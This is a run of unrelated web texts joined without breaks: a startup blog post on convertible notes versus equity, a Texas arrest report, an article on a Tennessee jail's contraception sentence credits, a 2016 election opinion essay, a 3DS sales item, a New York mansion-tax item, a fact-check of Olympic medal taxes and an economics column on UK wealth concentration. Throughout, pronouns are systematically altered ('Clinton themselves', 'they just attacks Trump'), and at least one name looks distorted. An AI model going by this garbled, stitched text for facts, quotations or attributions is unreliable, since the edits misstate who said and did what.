7 . We 're the freest people in the world . No one is more free than us . Freedom !
USA . USA . USA .
A reader named Turner Dean recently asked me whether it 's better to raise seed money on convertible notes or straight-up equity . Since this is a hefty topic that we could discuss for days , in this post I 'll aim to cover just the pros and cons of each from a founder 's perspective ; I will NOT cover :
What is a convertible note , equity , or convertible security ?
What major terms you should look for , be aware of , and ask for ?
There are a ton of other blogs out there that will cover these two topics in great detail . My expectation is that you 'll check out some of those other resources first if you 're not familiar with any of this . Just do a Google search .
In general , I 'm a big fan of convertible notes and convertible securities for seed stage founders . These are the big pros ; they are :
Cheap
Quick — you can start bringing in money immediately
Flexible — there 's no such thing as a round , so you can start and stop raising at any time
Cheap
Because convertible notes and convertible securities are basically standard — in fact , if you 're not using one from the internet , your lawyer ( at least most lawyers in Silicon Valley ) should be able to provide you with a free template that you can modify — these should be basically free . I think my total legal bill for getting my seed round done for LaunchBit was < $ 3000 . In contrast , if you do an equity round , you as the founder will often have to pay $ 20k- $ 50k in legal bills . You may also be on the hook for your investors ' legal bills , though this is changing a lot these days .
Quick
Once you get a convertible note signed , you can ask your investor to wire you the money or send you a check . You can start bringing money into your bank account right away and can start deploying it immediately . In contrast , if you do an equity round , you have to complete the entire round and go through the full due diligence process before anyone wires you money . This process can take a couple of months . Frankly , in my opinion , if you 're a fast-growing startup that 's deploying capital into your growth process , you really ca n't afford to wait months .
Flexibility
In an equity round , you 're raising a specific amount of money . With a convertible note or a convertible security , while there may be an upper bound to a note , there 's no fixed amount that you need to raise . You can always create new notes easily if you need to raise more money or raise an amount less than what you intended under your existing note . Flexibility is good because you may want to change the nature of your round as you see what the uptake is . If you have great uptake , you may end up wanting to raise more money on another tranche of notes at a higher cap . If the uptake is bad , you may want to wrap up your round shy of your initial target round and go back out into the market to raise again later once you 've made more progress .
In reality , it almost does n't make sense to do a priced round at such an early stage because you do n't know what the fundraising landscape will be a priori . You may not know what you 'll be able to raise or what makes sense to raise before you start .
Cons
Jason Lemkin has referenced a lot of the cons of doing convertible notes and convertible securities in their blog post here . Namely :
Investors spend less time with you , feel less committed to the company , and wo n't help you as much with your next round
Your legal bill will be higher when you have to sort out all of your notes later when they convert to equity
Investors
A big reason investors feel less committed when they sign convertible notes is that they do n't know what their stake will be in the end . Downstream investors can potentially rewrite a lot of the conversion terms later , screwing over earlier investors . This happens more than you might imagine . So , early stage investors tend to be more wary of convertible notes and convertible securities . Some early stage investors , especially outside of Silicon Valley , still wo n't do any deal that is on a convertible note or convertible security ; if you 're not based in Silicon Valley , this is something to consider . Despite this , I still think convertible notes and convertible securities are founder-friendly and worth doing as an investor . The bigger lessons for us investors are probably on trying to steer founders away from piranha-like , downstream VCs .
Legal bill
Sorting out all of your convertible notes at what caps , etc. , will become a bear when you raise your first equity round . This is especially true if you follow the tranche strategy of which I 'm a big proponent ( more on this later ) . You 'll pay for this later when you sort it out with your lawyer . That being said , I still think it 's better to raise money in tranches on a convertible note or convertible security and defer your complicated conversion to equity later . I see this a bit akin to technical debt . As a startup , you often need to do what is best for you now in the quickest , scrappiest , and cheapest way possible , otherwise you just wo n't make it . We hold this to be true in product development , and it should also hold true when raising your seed round . You just do n't have time or money to worry about making things clean now . When you have more resources later , you will pay for it . And that 's ok . If you get there , big props to you . Most companies never get to a true series A equity round and never have to worry about this deferred legal bill .
While there are a lot of pros and cons to raising on a convertible note or convertible security , if you are based in Silicon Valley , I think it makes a lot of sense to do so as a founder at the seed round .
A man was accused of child abandonment after they were found passed out in a parked car outside the Round Rock Public Library with three crying children inside the vehicle , an arrest affidavit said .
Mark Author Webb , 29 , of Round Rock , was charged with abandoning or endangering a child , a state jail felony punishable by up to two years in jail . They were also charged with possession of a controlled substance and public intoxication , both misdemeanor charges .
A witness told police Sunday that a man was passed out in the driver 's seat of a car parked in the back parking lot of the Round Rock Public Library at 216 E. Main St. , the affidavit said . The witness said that three children were crying inside the car but the man was not waking up , according to the affidavit .
It said a police officer tried several times to wake up the man — later identified as Webb — but was n't able to do it until one of the children in the car put their hands on Webb 's face .
READ : Man accused of abandoning 6-year-old son at Georgetown hotel
When Webb woke up they appeared to be confused and got the day of the week and the name of the current U.S. president wrong , the affidavit said . It said Webb `` believed today was ‘ Tuesday ' and that ‘ Obama ' was still president . ''
When Webb was asked to step outside the car they were unsteady on their feet , had slurred speech and their breath smelled like alcohol , the affidavit said .
It said police found a 24 ounce can of High Gravity Lager Earthquake that has a 10 percent alcohol content on the floorboard behind the driver 's seat of the car . Police also found two Xanax pills inside the car , the affidavit said .
The affidavit said one child was a one-year-old boy ; it did not give the age of the other two children , who were in the unlocked car with the windows down .
Webb was being held in the Williamson County Jail Wednesday with bail set at $ 12,500 .
FOR MORE NEWS : Be sure to follow the Williamson County News Now page on Facebook
Eugenics , or forced sterilization and controlled breeding , accounts for some of the darkest projects in American history . It 's seldom talked about or taught in schools , but the sterilization of women in prisons was common until as recently as 2010 .
So guess what 's back again in 2017 .
A jail in White County , Tennessee , is coercing both men and women to take on semi-permanent birth control procedures in exchange for a 30-day credit off their jail time , News Channel 5 reported Wednesday . The program was designed with the intent of instilling “ responsibility ” in the incarcerated .
“ I hope to encourage them to take personal responsibility and give them a chance , when they do get out , to not be burdened with children , ” Judge Sam Benningfield , who signed the standing order on May 15 , said . “ This gives them a chance to get on their feet and make something of themselves . ”
Nexplanon is inserted into the arm and can prevent pregnancy for four years . Uncredited/AP
If you 're a woman , the program gives you a free implant of Nexplanon , a small rod inserted into the arm that prevent pregnancy for up to four years . Men who volunteer get a free vasectomy courtesy of the Tennessee Department of Health . So far , a reported 38 men and 32 women are awaiting or have undergone the respective procedures .
The ACLU is already calling the program “ unconstitutional . ”
“ Such a choice violates the fundamental constitutional right to reproductive autonomy and bodily integrity by interfering with the intimate decision of whether and when to have a child , imposing an intrusive medical procedure on individuals who are not in a position to reject it , ” an ACLU statement read . “ Judges play an important role in our community — overseeing individuals ' childbearing capacity should not be part of that role . ”
It was a headline that launched headlines . On August 24 , Politico , the buzzy Bible of the Beltway , put these words atop its homepage : “ Hillary Clinton 's run-out-the-clock strategy : The Democrat aims to ignore the email and Foundation controversies , seeing a shrinking calendar as their friend . ”
In other words , Hillary has it in the bag ; Democrats can start measuring the drapes in the Oval Office .
As the article explained , the Clintonites , having all but won the 2016 election , now must just “ ride it out. ” That is , get going on early voting and other get-out-the-vote efforts , and then sit back and count down the days until victory on November 8 .
Indeed , Politico offered us a peek into the inner soul of the Clinton presidential campaign . Perhaps providing too much information , the article emphasized that the “ run out the clock ” strategy was reflective of the thinking of the candidate :
It 's a strategy borne , in part , of a belief held deeply by Clinton themselves that the email controversy is a fake scandal and that voters are as sick of it as the candidate herself—and by the profound weaknesses of Clinton 's opponent .
So there we have it : Hillary thinks that all the questions and concerns are just a product of the fabled “ vast right-wing conspiracy . ”
And if Hillary does n't want to hear any bad news—or answer any questions—it 's a safe bet that nobody on their campaign staff wants to tell them any bad news , or urge her , actually , to hold a press conference . And besides , there 's plenty of good news to talk about : Why , they raised $ 143 million , just in August ! They are beloved from the Hamptons to the Hollywood Hills !
Yet amidst all the lavish partying , some observers are offering a grimmer assessment , appearing like the ghost of the murdered Banquo crashing Macbeth 's celebratory feast .
A few days after the Politico story , on August 28 , election analyst Nate Silver headlined their piece at FiveThirtyEight , “ It 's Too Soon For Clinton To Run Out The Clock. ” They observed , “ It 's August , and the number of undecided voters is high , and so the outcome remains fairly uncertain. ” MSNBC 's Joe Scarborough then added on August 31 , “ She needs to wake up and understand they could still lose . ”
Indeed , the polls have been tightening : The latest Real Clear Politics polling average shows the four-way race—and it is a four-way race ; the Libertarian candidate , Gary Johnson , is on the ballot in all 50 states , and the Green candidate , Jill Stein , is on the ballot in at least 37 states—as being neck-and-neck : Clinton leads by just 3.2 percent . And their overall total is a less-than-commanding 41.4 percent .
We might add that the general rule for incumbents—and Hillary is certainly a quasi-incumbent—is that undecideds will break against the incumbent on Election Day . Still , it 's a four-way race , and so we ca n't know for whom those late-deciders will break . And yet can say with almost certainty , they wo n't break for Clinton .
In the face of this obvious weakness , other observers , too , are expressing skepticism : Here 's The Hill , on September 3 : “ Clinton 's ‘ run-out-the-clock ' strategy under fire. ” As the piece noted ,
The Democratic nominee nearly vanished from the campaign trail in August to attend high-end private fundraisers and to prepare for the first presidential debate on Sept. 26 .
Yes , Clinton conspicuously did not travel to Louisiana to console the flood victims . ( Back in 1995 , they reportedly made this derisive comment about white Southerners to their husband : “ Screw ‘ em . . . you do n't owe them a thing , Bill . They 're doing nothing for you ; you do n't have to do anything for them . ” )
Meanwhile , the controversy about the Clinton Foundation and their handling of the e-mail matter has exploded ; it 's now front page news , even for the MSM . But of course , Hillary , over-consulted , over-handled , and over-protected as they are , has little capacity to react . Besides , they must prepare for that first debate—a debate that 's more than three weeks away .
And at the same time , Trump is everywhere . After a speech on the morning of August 31 , they jetted to Mexico , met with president Enrique Peña Nieto , and then returned to the US for another speech . Trump is a year older than Hillary , and yet they have vastly more energy and zeal for campaigning .
For its part , Politico , deeply invested as it is in the Clinton campaign , continues to be a source of fawning headlines . Hence this keeper on September 2 : “ Clinton 's advisers tell them to prep for a landslide. ” ( It was later softened to the slightly less cheerleader-ish : “ Clinton advisors see multiple paths to a commanding win : Displaying unchecked confidence , the Democrat 's paid consultants say they have a wide open route to the White House. ” ) As an aside , we can observe that fawning headlines might make for nice reading at Clinton 's Brooklyn HQ , but misleading headlines only add to an unjustifiable complacency .
Yet even at Politico , which has so much riding on a Clinton victory , doubts are starting to creep in . This quote is from a September 1 story attributed to a longtime adviser to both Clintons :
We have a ton of work to do… Being candid and trustworthy are the two last , big hurdles for her , and the debate is as much about dealing with those as disqualifying Trump .
We might pause over some of those words : Being candid and trustworthy are the two last , big hurdles for them And this is from an ally .
Okay , so it would seem that the 2016 election is , to put it mildly , no shoo-in .
In fact , we 've seen it before . And when was that ? Back in 1948 . The parallels are n't exact , but they are persuasive .
The incumbent president that year was , of course , Harry Truman . Today , the 32nd president is seen as a great man , but at the time , Truman , having assumed the presidency after the death of the revered Franklin D. Roosevelt in 1945 , was seen as something of a bumbler , an unworthy successor . As wags liked to say back then , “ To err is Truman . ”
Moreover , the Democrats had enjoyed uncontested power in Washington since 1932 , and the voters were itching for a change . Indeed , the Republicans had won a smashing victory in the 1946 midterm elections ; their slogan was blunt : “ Had Enough ? ” ( One of the Republicans who defeated a Democratic incumbent that year was a young Navy veteran named Richard Nixon . )
So in the run-up to the 1948 election , Republicans were feeling good ; they had a strong presidential candidate , they thought , in New York Governor Thomas E. Dewey . In fact , the polls showed Dewey ahead by what many back then judged to be an invincible margin—five or six points .
Yet for their part , Truman would have none of it . Advised by top strategist Clark Clifford , Truman calculated that the country was still basically with them and their party . That is , the voters were grateful to the Democrats for Social Security , for farm programs , for labor unions , for recognizing the embattled state of Israel , and for winning World War II—so they just needed a reminder .
At the same time , Truman resolved to paint the Republicans as unchanged since the bad old days of Herbert Hoover , the hated predecessor to FDR .
In their acceptance speech at the Philadelphia Democratic convention on July 15 , 1948 , Truman laid it on the line : “ I will win this election and make these Republicans like it—do n't you forget that ! ” Yes , it was a brassy display of bravado from an underdog . But Truman was n't anywhere near done :
Victory has become a habit in our party . It has been elected four times in succession , and I am convinced it will be elected a fifth time in November . The reason is that the people know that the Democratic Party is the people 's party… The record of the Democratic Party is written in the accomplishments of the last 16 years .
Having thrown down the gauntlet , Truman proceeded to lay out all that the Democrats had done for farmers , for workers—and for the country .
In some ways , Truman 's speech was counter-intuitive to modern ears . These days , we are always told that elections are about the future , not the past . And that 's true , but it 's also true that past performance is the best single indicator of future performance . And so , for example , the fact that unemployment in 1948 was less than four percent—it had been 25 percent the last time a Republican had been in the White House—was more than meaningful to the voters .
In other words , Truman 's mission , as they defined it , was clear-cut : They simply had to rally all the Democratic voters . It was , to use the modern parlance , a base election—and back then , the Democrats had the bigger base . The message was simple : Do n't go back to the bad old days .
Still , the experts and pundits were convinced that Truman would lose . In October , Newsweek surveyed political savants in each of the 48 states , and they were unanimous : Dewey would win .
Meanwhile , the pollsters—there were only three back then , Gallup , Roper , and Crossley—were equally sure that Dewey was the inevitable victor ; in fact , they all stopped their surveying weeks before the November 2 election .
Yet as we all know , Truman won the '48 election . Indeed , they won it by a comfortable 4.5 percent margin—and with an edge of 114 votes in the electoral college .
So what had happened ? As we have seen , the fundamentals favored Truman : This was a New Deal country in 1948 , and Truman was a loyal and faithful New Dealer—and they had , of course , been FDR 's vice president .
On the Republican side , Dewey understood this reality ; that 's why they tried to be moderate and uncontroversial during the campaign . They did n't want to be thought of as the voice of the Republican Party , they wanted just to be Tom , the nice guy sporting a stylist mustache . To borrow a phrase , they hoped they could just “ run out the clock . ”
Yet Truman , in all their feisty aggressiveness , pulled back Dewey 's bland and opaque veil : Folks , do n't be fooled ! In their heart , he 's just another Hooverite !
Okay , so now , back to the present : What 's the parallel ? How does the 1948 election speak to the 2016 election ?
Here 's how : This time , Clinton , as we have seen , is the quasi-incumbent . But this time , people are anything but happy with the status quo .
Thus the difference : In 1948 , the fundamentals were with Truman ; in 2016 , the fundamentals are against Hillary .
Whereas all Truman had to do , 68 years ago , was remind people that they 'd never had it so good , this year , Clinton ca n't rest on such laurels of accomplishment—because there are n't any . And so they have n't even tried , nor do they talk much about the future . Instead , they just attacks Trump .
As we all know , that attack-Trump strategy was working well for awhile , combined , of course , with some Trump mistakes .
Yet in recent weeks , Trump has found their footing . Indeed , it 's now Trump who 's on the offensive . They declare that the economy is slow , that crime and terrorism are rising , that the border is in chaos , that the Iran deal is a disaster . And who can truly say he 's wrong ?
In the face of these armor-piercing attacks , Hillary , even with the MSM rallying to their defense , can say little in response . Yes , they can jointly accuse Trump of being “ dark ” and “ dystopic , ” but that 's about all they can say . Soon , such bleats—which bespeak more than a little bicoastal smugness—begin to sound tinny , the mere yelping of elite insiders .
In fact , the bottom line today is that most people are feeling dark and dystopic—and with good reason . As The Atlantic noted the other day ,
A majority of Americans now worry that they or their families will be victims of terrorism , up from a third less than two years ago , according to a survey by the Public Religion Research Institute . Nearly two-thirds worry about being victims of violent crime . Another poll , by Gallup , found that concern about crime and violence is at its highest level in 15 years .
Thus we can see : The key question is how the voters assess the state of the nation . In 1948 , they were happy with the status quo , and so they voted to keep it . In 2016 , they are unhappy with the status quo , and so it seems increasingly likely that they will vote to change it .
Thus if we look ahead , we can say : Donald , meet your spiritual predecessor , Harry . And Hillary , meet your predecessor , Tom .
Share . Plus , Monster Hunter 4G continues to excel . Plus , Monster Hunter 4G continues to excel .
Nintendo 's revamped 3DS and 3DS XL sold more than 230,000 units within just two days of going on sale in Japan .
According to Famitsu ( via NeoGAF ) the 3DS XL was the more popular offering as it sold 172,332 units compared with the 61,151 managed by the New 3DS . That said , it 's likely the decision to bundle the larger model in with the 3DS-exclusive Monster Hunter 4G played a role in those numbers .
Exit Theatre Mode
Monster Hunter 4G managed to move 1.6 million copies in total , which is an incredibly impressive number in such a small space of time .
As for when the rest of us will see the new models , Australia and New Zealand are next in line with a November release currently planned , while both Europe and North America have to settle for a vague `` 2015 '' for now .
The redesigned models of the 3DS and 3DS XL , which feature additional controls , an improved screen and CPU , better battery life , and built-in support for Nintendo 's amiibo range , were announced in August . For full impressions , check out what we thought when we got to grips with the revamped handhelds .
Luke Karmali is IGN UK News Editor . You too can revel in mediocrity by following them on Twitter .
Not to be confused with the “ pied-à-terre tax , ” the city is now mulling over the idea to raise the “ mansion tax. ” The proposal has an unlikely supporter- Related Companies ' chairperson Stephen Ross .
The proposal would increase the tax on the most expensive apartment sales in the city to pay for affordable housing , according to the Wall Street Journal . If introduced , the plan will need approval from the state legislature .
Currently , the mansion tax levies a one percent tax on housing sales that exceed $ 1 million . The current tax generated $ 259 million during the 2013 fiscal year .
Some developers have said that the plan would discriminate against extremely wealthy buyers , but others in the real estate business have shown support , the newspaper reported . Among the supporters is Stephen Ross , who is at the helm of the city 's most active development firm . Ross reportedly said that the tax would be a good source of money , due to the strong state of the luxury housing market .
“ A tax on very high-end condos would be a better way to create resources for affordable housing than further taxing rental development , ” Two Trees Management 's Jed Walentas , who is developing the Domino Sugar factory , told the Journal .
A 0.5 percent increase on apartment sales of $ 5 million or more would generate $ 34 million in 2015 , according to New York City 's Independent Budget Office , the newspaper reported . It 's unclear how big the increase would be .
Extell Development 's Gary Barnett , the developer behind One57 , does not support the proposal . “ Anything that 's discriminatory against a class of owners , visitors , buyers in New York City sends the wrong message and will be counterproductive , ” they told the newspaper . [ WSJ ] — Claire Moses
With Americans paying close attention to the London Olympics , two leading figures in the conservative movement -- Grover Norquist and Marco Rubio -- have launched an effort to lighten the tax burden for athletes who win medals .
A July 31 , 2012 , blog post on the website of Norquist 's group , Americans for Tax Reform , had the headline , `` Win Olympic Gold , Pay the IRS : U.S. Olympic medal winners will owe up to $ 9,000 to the IRS . ''
The ATR blog post continued , `` American medalists face a top income tax rate of 35 percent , '' ATR wrote . `` Under U.S. tax law , they must add the value of their Olympic medals and prizes to their taxable income . … At today 's commodity prices , the value of a gold medal is about $ 675 . A silver medal is worth about $ 385 while a bronze medal is worth under $ 5 . There are also cash prizes that accompany each medal : $ 25,000 for gold , $ 15,000 for silver , and $ 10,000 for bronze . '' These prizes are given by the U.S. Olympic Committee .
ATR went on to offer calculations of what medal winners might owe the IRS , using that 35 percent tax rate . A gold-medal winner would owe $ 8,986 , while a silver-medal winner would owe $ 5,385 and a bronze winner would owe $ 3,502 .
These calculations were widely noted in the blogosphere . The following day , Aug. 1 , Sen. Marco Rubio , R-Fla. , introduced the Olympic Tax Elimination Act , which would `` exempt U.S. Olympic medal winners from paying taxes on their hard-earned medals . ''
Rubio 's news release said the U.S. tax code `` is a complicated and burdensome mess that too often punishes success , and the tax imposed on Olympic medal winners is a classic example of this madness . Athletes representing our nation overseas in the Olympics should n't have to worry about an extra tax bill waiting for them back home . '' ( A new Olympics tax exemption might make the tax code more complicated , but we digress . )
After a reader notified us of this developing issue , we decided to fact-check ATR 's specific claim that `` U.S. Olympic medal winners will owe up to $ 9,000 to the IRS . ''
We checked with accountants who specialize in representing athletes and they agreed that the bonus would almost certainly be taxable . Our experts diverged somewhat over whether and how the medal would be treated for tax purposes , but we 'll assume for the purposes of our analysis that it is subject to taxation .
We will also note that ATR said `` winners will owe up to $ 9,000 '' -- a phrase that gives the group leeway for its estimates .
Still , the experts we spoke to suggested that a $ 9,000 tax payment was unrealistically high . For most athletes , the payment will be less , and possibly quite a bit less . Here 's why :
Business expenses
An athlete who wins a medal bonus would be free to deduct any unreimbursed expenses from the bonus , lowering -- or maybe even eliminating -- their tax hit . In fact , accountants say an athlete would be crazy not to .
`` Anything used for the production of income is deductible , '' said Brad Bell , a partner with BGBC Partners LLP in Indianapolis who specializes in accounting for athletes .
Greg Shafer , an accountant in Colorado Springs , Colo. , added that `` if they were my client and had to pay that kind of tax , I would say , ‘ Well , what are your ordinary and necessary expenses ? ' That could be travel , uniforms , cell phone use . '' The U.S. Olympic Committee is based in Colorado Springs , and Shafer said they have provided accounting services to athletes .
So expenses for gymnasts might include tumbling classes , payments to coaches and travel costs to international meets . Cyclists would pay for new bikes and maintenance . An Olympian fencer told Forbes.com that their expenses for equipment and competitions run around $ 20,000 per year .
Not every athlete earns as much as Michael Phelps
The way the U.S. tax system is constructed , income is taxed at higher rates the higher your income goes . So the full 35 percent rate ( known as the marginal rate ) only kicks in on income earned after you pass a threshold of about $ 380,000 . Below that level , income is taxed at lower tax rates .
So even someone earns well into the six figures will likely see an overall ( or `` effective '' ) tax rate quite a bit lower than 35 percent -- even before you take into account exemptions and deductions .
When we contacted ATR , Ryan Ellis , the group 's tax policy director , defended the calculations . They said that when you 're isolating a specific element of someone 's income , it 's actually more appropriate to use marginal tax rates rather than effective tax rates , because in the calculation , the medal is the essentially last piece of income being considered , and thus gets taxed at the highest marginal income rate .
They added that while athletes may scrape by in low tax brackets in non-Olympic years , the Olympic year is the one in which they would have a reasonable shot of getting into a higher tax bracket -- if not 35 percent , then perhaps 33 percent or 28 percent , a rate that would still produce a high tax bill .
Still , while some world-class athletes come into the Olympics as international superstars with lucrative endorsement deals , many athletes earn less . Though the data is incomplete , we did find one study conducted by the Track & Field Athletes Association that found that about half of track and field athletes who ranked in the top 10 in the U.S. in their event made less than $ 15,000 annually from the sport in sponsorship , grants and prize money . About 20 percent of such athletes made more than $ 50,000 annually . And beyond marquee athletes such as sprinters , milers and distance runners it 's toughest of all , the study found .
There 's anecdotal evidence as well . Marathoner Brian Sell , who made the 2008 U.S. Olympic team , told CNNMoney that it took years of struggle , including three years earning less than $ 25,000 , before they made significant money from running . `` It 's a small percentage of people who make a real living in this sport , '' they told CNNMoney . `` And if you did n't run well , you did n't get paid . ''
An athlete earning the same $ 25,000 a year that Sell earned for three straight years would pay about 15 percent on gold medal winnings . That would be $ 3,851 -- before accounting for any allowable expenses .
We should also note that there is nothing special or `` extra '' about the taxes levied on income derived from Olympic victories . They are the same taxes laid on any kind of income , whether that 's from wages or lottery winnings .
Our ruling
Americans for Tax Reform is correct that gold medalists ' winnings are taxable , and it provides some leeway by saying that U.S. winners could be taxed up to $ 9,000 .
Still , it 's not likely that anyone would pay that much per medal in taxes -- even if the winner was fortunate enough to have annual income well over $ 380,000 and refused to deduct any business expenses on their winnings . Any accountant worth their salt should be able to get the rate of tax on medal winnings much below $ 9,000 , and maybe even to zero . We rate the statement Mostly False .
EDITOR 'S NOTE : After our article appeared , Americans for Tax Reform posted a rebuttal to our article that can be read here . We stand by our original rating .
The importance of wealth concentration and why it is so difficult to measure
Facundo Alvaredo , Tony Atkinson , Salvatore Morelli
The concentration of personal wealth has received a lot of attention since the publication of Thomas Piketty 's Capital in the 21 st Century . This column investigates the UK and finds wealth distribution to be highly concentrated . The data seem to suggest that the top wealth share has increased in the UK over the first decade of this century .
The concentration of personal wealth is now receiving a great deal of attention after having been neglected for many years . The much discussed book by Thomas Piketty , Capital in the 21st Century , stirred up an astounding debate across the world due to their dystopic vision of a future world where wealth will be more and more concentrated within the hands of a small elite that will perpetrate its own power by passing on enormous fortunes and advantages to the select few of the following generation .
Piketty urged governments to take steps to prevent this from happening . As argued by Ravi Kanbur and Joseph Stiglitz in a recent Vox column ( Kanbur and Stiglitz 2015 ) , the increase in wealth we observe nowadays stems in part from the increase in rents which “ once created will provide further resources for rentiers to lobby the political system to maintain and further increase rents ” . The surge of interest in wealth distribution is additionally justified by the recognition that , in seeking to understand the determinants of rising income inequality , we need to look not only at wages and earned income but also at income from capital , particularly at the top of the distribution.1
But how much do we actually know about wealth concentration at the top and how it is changing today ? In a new paper ( Alvaredo et al . 2015 ) , we look at the UK – a country where the wealth distribution has long been studied – and ask three questions :
What is the share of total personal wealth that is owned by the top 1 % ?
Is wealth much more unequally distributed at the top than income ?
How far is wealth concentration increasing in the 21st century ?
Our central theme is that there are different sources of evidence about wealth concentration , each with strengths and weaknesses . To some extent they tell similar stories , but there are also key differences , and these differences explain in part the reasons why the subject has given rise to controversy .
Estate data-based estimates
First of all , the administrative tax data on estates at death can indirectly provide evidence about the wealth of living individuals , by which we mean the value of the total assets owned by individuals , net of their debts.2 This is achieved by applying ( the inverse of ) mortality multipliers differentiated by age , sex and wealth class . These data provide unique coverage of the wealth holders at the top but tax data are also affected by tax evasion and avoidance and the estate-based estimates rests on the reliability of the multipliers .
In the UK , the official HMRC Series C was estimated using the estate multiplier approach , up until 2005 . The share of the top 1 % is shown in Figure 1 . In 2005 the series was replaced by a new data series focusing exclusively on the identified wealth ( note that only estates submitting an inheritance tax return are captured – estates of low value are generally excluded , as well as those held in trusts or in joint names passing to a surviving spouse or civil partner ) .3 In particular , adjustments were no longer made for excluded wealth , for inappropriate valuations , and to a balance sheet basis . The estimates labelled ‘ derived from HMRC new series ' in Figure 1 show a smaller top wealth share for the period of overlap .
Figure 1 . Estimates of the top 1 % wealth shares in the UK since 2000
Note : the WAS estimates relate to households and to Great Britain .
These UK estate-based estimates indicate that the distribution of wealth is highly concentrated . The top 1 % own between one fifth and one quarter of total personal wealth . Second , the share of the top 1 % in total net worth ( of individuals ) is around double the share of the top 1 % ( again , of individuals ) in total net income ( income after deducting income tax ) , which in the first half of the 2000s was around 10 % .4 Thirdly , there is some indication that the top shares in wealth were increasing between 2001-2003 and 2008-2010 .
Investment income-based estimates
A quite different approach is to multiply up investment income reported in income tax returns to give an estimate of the underlying wealth . The investment income method , like the estate method , has a long history and was investigated extensively in the UK in Atkinson and Harrison ( 1978 ) . Use of the method has been revived in the US by Saez and Zucman ( 2014 ) . They apply yield multipliers , differentiated by asset class , to administrative tax data on different types of investment income in order to estimate the wealth holdings . We are exploring the possible use in the UK of either their method or that adopted in the 1970s by Atkinson and Harrison . However , it requires more detailed information than is currently publicly available either on investment income by category or on the classification of assets by types .
Household survey-based estimates
Representative household surveys can provide direct evidence of personal wealth within the population . Figure 1 shows the estimated share of the top 1 % for Great Britain ( i.e . the UK excluding Northern Ireland ) based on the Wealth and Assets Survey as supplied to the OECD by the ONS . These shares differ from those obtained using the estate data in that they relate to household wealth ( rather than individual wealth ) , and are shown including and excluding pension rights .
The first finding is that , in the case of the overlapping period 2008-2010 , the Wealth and Assets Survey estimates excluding pension wealth suggest a share of the top 1 % that is considerably below the estate-based estimates : 14 % for the top 1 % , compared with 20 % . These estimates are household-based and the geographic coverage differs , but the difference is larger than could be explained in this way . One has to ask how far the top shares may be under-estimated as a result of differential non-response to the household survey . The response rate to the first wave was 55 % . It is also the case that business assets were excluded from the Wealth and Assets Survey estimates of total wealth , an omission that is likely to be particularly important in the upper wealth ranges .
The second finding is that the household survey-based estimates supplied by the ONS to the OECD show a distinct upward trend . The share of the top 1 % in 2010-2012 is 2.7 percentage points higher than in 2006-2008 when measured including pension wealth , and the increase is nearly double ( 5.3 percentage points ) for the estimates excluding pension wealth . Such a striking conclusion needs to be investigated further .
Combined with the rich lists
Lists of large wealth-holders , such as the Forbes List of Billionaires or the Sunday Times Rich List for the UK , can also provide useful estimates for the share of total wealth owned by the wealthiest individuals . The rich lists provide information on the shape of the upper tail of the wealth distribution that allows for a more detailed investigation of the distribution within the top one percent . To date , official estimates of wealth concentration have not shown shares for groups smaller than the top one percent . The Sunday Times Rich List for 2010 , for example , has 1,000 people with £335.5 billion . These make up 0.004 per cent of total Great British households and 5.3 % of total Wealth and Assets Survey non-pension wealth . However , such data do not necessarily guarantee the representativeness of the sample and often use different definitions of units of analysis as well as geographical coverage of wealth holdings .
There are in addition synthetic estimates that draw on two or more sources , carried out by Davies and Shorrocks in the estimates they have prepared for Credit Suisse ( Credit Suisse Research Institute 2014 ) . In effect , they use the total number of UK billionaires ( but not their wealth ) reported in the Forbes list to fit a Pareto distribution . The changing number of billionaires drives the year-to-year changes shown in Figure 1 ( the dashed series ) , since the distribution is otherwise based on the Wealth and Assets Survey 2006-2008 . As may be seen , their estimates suggest that the share of the top 1 % is close to the estate-based estimates , and the share has increased by some 3 percentage points over the period 2000-2014 .
Wealth distribution is often highly concentrated and the UK is clearly no exception . The estate-based estimates certainly suggest that individually held wealth is more concentrated than individual gross incomes . Moreover , our estimates provide some support for the view that the top wealth share increased in the UK over the first decade of the present century .
However , the evidence about the UK distribution of wealth post-2000 is far from complete . Significant investment is necessary if we are to provide satisfactory answers for the UK to the three questions with which we began . There needs to be a re-examination of the estate method in the light of 21st century circumstances . HMRC estate-based estimates should be continued and improved and data need to be made available to allow use of the investment income method to be properly assessed . There also needs to be a reconciliation of the differing pictures shown by the estate estimates and household surveys regarding top wealth-holdings , and the potential of rich lists can be more fully exploited .
References
Alvaredo F , A B Atkinson and S Morelli ( 2015 ) , “ The challenge of measuring UK wealth inequality in the 2000s ” , CEPR DP 10810 , forthcoming Fiscal Studies .
Alvaredo F , A B Atkinson , T Piketty and E Saez ( 2013 ) , “ The Top 1 Percent in International and Historical Perspective ” , Journal of Economic Perspectives 27 ( 3 ) : 3-20 .
Alvaredo F , A B Atkinson , T Piketty and E Saez ( 2015 ) , The World Top Incomes Database , available at http : //topincomes.g-mond.parisschoolofeconomics.eu .
Atkinson , A B and S Morelli ( 2014 ) , “ The Chartbook of Economic Inequality ” , available at http : //www.chartbookofeconomicinequality.com .
Credit Suisse Research Institute ( 2014 ) , Global Wealth Databook 2014 , London .
Kanbur , R and J Stiglitz ( 2015 ) , “ Wealth and income distribution : New theories needed for a new era ” , VoxEU , available at http : //www.voxeu.org/article/wealth-and-income-distribution-new-theories ....
Morelli S , T Smeeding and J Thompson ( 2015 ) , “ Post-1970 trends in within-country inequality and poverty : rich and middle income countries ” , in A B Atkinson and F Bourguignon ( eds . ) Handbook of Income Distribution Volume 2A , Chapter 8 , pp . 596-693 , Elsevier B V .
Piketty , T ( 2014 ) , Capital in the twenty-first century , Cambridge Massachusetts : Harvard University Press .
Saez , E and G Zucman ( 2014 ) , “ Wealth inequality in the US since 1913 : Evidence from capitalized income tax data ” , NBER Working Paper 20625 .
Vermeulen , P ( 2015 ) , “ How fat is the top tail of the wealth distribution ? ” , unpublished working paper .
Footnotes
See Alvaredo et al . 2013 , Alvaredo et al . 2015 , Atkinson and Morelli 2014 , and Morelli et al . 2015 for a broad view on trends in different economic inequality indicators ranging from top income shares to relative income poverty indicators .
2 Assets include financial assets , such as bank accounts , stocks or bonds , and real assets , such as houses , business assets and consumer durables . As defined here , they do not include ‘ human capital ' ( the capitalised value of future earnings ) .
3 The HMRC moved to producing estimates based on data averaged over three years ( the most recent being 2008-2010 ) in order to reduce sampling variation , and to the adoption of more reliable mortality multipliers .
4 The shares of the top 10 , top 5 and top 1 % are computed by the authors and are different from those appearing in the World Top Incomes Database simply due to the different definition of the population control total – adults aged 18 and over here ( for consistency with the wealth distribution estimates ) , and adults aged 15 and over in the World Top Incomes Database .
